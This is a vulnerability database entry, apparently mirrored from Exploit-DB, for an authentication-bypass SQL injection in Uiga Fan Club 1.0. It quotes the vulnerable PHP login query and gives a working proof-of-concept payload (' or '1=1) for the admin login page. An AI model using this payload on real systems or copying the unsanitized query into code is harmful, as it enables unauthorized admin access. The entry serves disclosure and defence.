Uiga Fan Club - exploit.company

vendor:

Uiga Fan Club

by:

cr4wl3r

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Uiga Fan Club

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:scriptdevelopers:uiga_fan_club

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability

Uiga Fan Club version 1.0 and below is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a malicious username and password in the admin login page. This will allow the attacker to bypass authentication and gain access to the admin panel.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
###########################################################################
# Author: cr4wl3r
# Download: http://www.scriptdevelopers.net/download/uigafanclub.zip
###########################################################################
#if (isset($_POST['admin_name']))
# {
# $admin_name=$_POST['admin_name'];
# $admin_password=$_POST['admin_password'];
#
#
# if(empty($admin_name))
# {
# $errorMessage=warning." Username is empty!";
# }
# elseif(empty($admin_password))
# {
# $errorMessage=warning." Password is empty!";
# }
# 
# 
# else
# {
# $sql="SELECT * 
# 	   FROM admin
#	   WHERE admin_name='$admin_name' and admin_password='$admin_password'";
#
###########################################################################

###############################################
PoC: [path]/admin/admin_login.php

     Username: ' or '1=1
     password: ' or '1=1
###############################################